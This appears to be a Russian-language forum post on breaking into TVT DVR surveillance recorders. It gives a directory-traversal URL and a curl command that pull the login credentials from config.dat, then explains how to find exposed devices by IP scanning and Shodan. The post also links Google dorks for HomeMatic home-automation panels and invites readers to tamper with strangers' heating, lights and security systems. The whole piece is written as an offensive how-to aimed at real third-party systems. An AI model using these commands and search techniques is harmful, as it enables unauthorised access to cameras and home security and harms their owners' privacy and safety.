Всем привет, хочу донести до Вас информацию, может и есть в открытом доступе но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даже на Украине на донбасе в последние время начали в мелькать подобные сообщения. Информация Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом «TVT TD-2308SS-B DVR directory traversal», — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс. Адрес где лежит конфигурационный файл. http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat 1 http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat Парсинг Именно для меня на данный момент такой способ парсинга самый актуальный. Использую я Advanced IP Scanner — линк на офф линк на офф Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download Вот такой вид имеет панель входа. Вот код самого експлойта curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings 1 curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings Вот пример Ну и все в итоге у нас юзер и пасс от панели Maybe End Все очень и очень просто. Есть еще поисковик Shodan через который тоже можно искать камеры.
, меня конечно больше заинтересовал эксплоит системы домашней автоматики, опубликованный все там же. Можно запросто добавить температуру у буржуинов дома, или поиграться со светом, или с жалюзи. Но самое интересное что можно запросто отключить систему безопасности Выкладывать тут не буду, а то бедным буржуинам не будет жизни от российских школьников. А нет наверное все таки сделаю гадость: https://www.exploit-db.com/ghdb/4199/ А это совсем для ленивых сразу поиск в Google по эксплоиту: https://www.google.ru/search?q=intitle:"homematic+webui"&gws_rd=cr,ssl&ei=hKPYVpnGDciU6ASEsZywCA Если нашли что то типа HomeMatic WebUI можно заходить и играться Ну и вот еще одно из последнего https://www.exploit-db.com/ghdb/4205/ Поиск в Google https://www.google.ru/search?q=inur...:user&gws_rd=cr,ssl&ei=TaTYVrXxAavm6ATNiLfQDw Ну тут сами разберетесь.